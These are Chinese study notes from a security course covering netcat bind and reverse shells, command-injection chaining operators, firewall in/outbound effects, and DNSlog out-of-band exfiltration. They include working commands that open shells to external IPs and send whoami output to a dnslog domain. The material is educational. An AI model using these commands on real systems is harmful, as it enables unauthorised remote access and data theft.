当前位置: 首页 > java >正文

安全学习基础入门5集

前言:

来源于b站小迪安全v2023第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_哔哩哔哩_bilibili

环境准备:

通过网盘分享的文件:netcat-1.11
链接: https://pan.baidu.com/s/1zgyYvPfbCvfQxoE6aouewA?pwd=hhrb 提取码: hhrb 

第五集内容:

重点是文件下载、无图形化的解决方法,资源网站:棱角社区

文件下载命令

        windows系统

        powershell、certutil、Bitsadmin、msiexec

        linux系统

        wget、curl、python、ruby、perl、java

反弹shell操作

原理:主要用于获取权限后,但是服务器没有交互、回显的情况,解决数据通讯

环境准备:一台linux(192.168.150.170),一台windows系统,装好了nc.exe(192.168.150.78),为内网和内网之间的测试

外网主机:152.12.31.251

正向连接

linux控制windows (linux主动去连接windows服务器)连接对方的ip,就是主动

         linux:nc 192.168.150.78 9090

         windows:nc.exe -e cmd -lvvp 9090

windows控制linux

        windows:nc.exe 192.168.150.170 9090

        linux:nc -e /bin/sh -lvvp 9090

反向连接

linux被windows控制(linux被连接)

        linux:nc -e /bin/sh 192.168.160.78 9090

        windows:nc.exe -lvvp 

windows被linux控制(windows被连接)

        windows:nc.exe -e cmd 192.168.150.170 9090

        linux:nc -lvvp 9090

内网和外网之间的测试,

外网用户控制内网只能用反向连接,外网不能用nc 192.168.150.78 9090

        外网:nc -lvvp 9090

        内网:nc.exe -e cmd 152.12.31.251 5566  

内网控制外网

        正向连接

        外网:nc -e /bin/sh -lvvp 9090

        内网:nc.exe 152.12.31.251 9090

        反向连接

        外网:nc -e /bin/sh 192.168.150.78   这种不行,也就是说

总结内网和外网之间的测试:内网控制外网只能用正向连接,外网控制内网只能用反向连接

管道符:|(管道符号,依次执行命令) ||(逻辑或,前一条命令执行错误,执行后一条) &&(逻辑与,两条命令都正确,才执行) &(后台任务符号,在windows是连接符号,在linux是会一直执行&前面的命令,除非用ps看进程,然后kill杀掉)

windows:|   &   ||   &&

linux:;   ||   &   &&   ``(特有 `` 和; )

两条命令都执行

ping 127.0.0.1 | whoami

ping 127.0.0.1 || whoami (前面为真,不执行后面的)

ping 127.0.0.1 && whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1  `whoami`

ping  `whoami`

防火墙策略

入站限制9090,出站宽松

        主动给出去,外面的监听就好了,相当于上面的外网控制内网的一样

如果设置了出站的限制了,但是入站如果没有设置放行,默认也是不能运行任何流量进入的

        相当于是入站严格,出站宽松的原理(我们设置了出站严格,那么本身入站也是严格的)

有漏洞,但是没有回显(前面的是)

利用dnslog进行带外操作

        利用ping带外的地址(dnslog),然后dnslog就会返回那个ip地址,顺便把命令执行了

        linux可以执行,ping `whoami`+带外ip,就会执行whoami的结果,顺便将结果带回来了,带          给了dnslog

        windows不可以执行  ``,但是windows里cmd的powershell可以赋值变量,然后可以间接的将          结果带出来

windows的带外操作(因为不能直接在cmd命令行上使用,所以要切换powershell版)

win+r打开命令行,使用命令:powershell,切换

        $a = whoami

        $b = '.ubt2xs.dnslog.cn'

        $c = $a + $b;

        $x = $c.replace('\','xxxx');

        ping $x;

linux版(就用``就可以外带了,因为linux支持``)

ping `whoami`+.外带地址

        例如:ping `whoami`.caiuz4.dnslog.cn

由于我服务器ping了没反应,不知道是不是只能国内的服务器ping?有点奇怪,但理论是没有问题的

http://www.xdnf.cn/news/3322.html

相关文章:

  • curl详解
  • 综合案例建模(1)
  • 毕业论文 | 基于STM32的自动烟雾报警系统设计
  • 4.30阅读
  • Seata客户端@GlobalTransactional核心源码解析
  • Linux企业级分区设置
  • PEFT实战(三)——IA3参数高效微调
  • QT6 源(62)篇五:阅读与注释 QString 这个类,先给出官方综述,带一些翻译。总篇目太大,代码就有 2000 行
  • c++ 归并排序(分治)
  • 中国1km分辨率1901-2023年均气温降水数据
  • 2025年- H15-Lc123-41.缺失的第一个正数(普通数组)---java版
  • 格雷希尔用于工业气体充装站的CZ系列气罐充装转换连接器,其日常维护有哪些
  • linux jounery 日志相关问题
  • 高性能架构设计-分库分表
  • 声明:个人从未主动把文章设置为仅vip可读
  • 国内 AI 发展路线分析
  • /var/log/sssd/` 目录解析
  • 【Linux】gcc/g++配置
  • ROS2与Carla安装设备(其三)测试 ROS 2
  • 【MySQL数据库】事务
  • [第十五章][15.3.2 shellcode注入攻击]ret2shellcode+[NewStarCTF 公开赛赛道]ret2shellcode
  • LiP-MS与TPP联用:千金藤素在高尿酸血症中的抗神经炎症作用
  • 玩转Nginx
  • 极狐GitLab 分支管理功能介绍
  • ALLEGRO怎么外扩或内缩铜皮shape?
  • 美国国家生物技术信息中心NCBI介绍
  • 信号完整性简介第二篇
  • 2025A卷-传递悄悄话
  • 01_K近邻
  • Java 集合框架优化:从基础到高级应用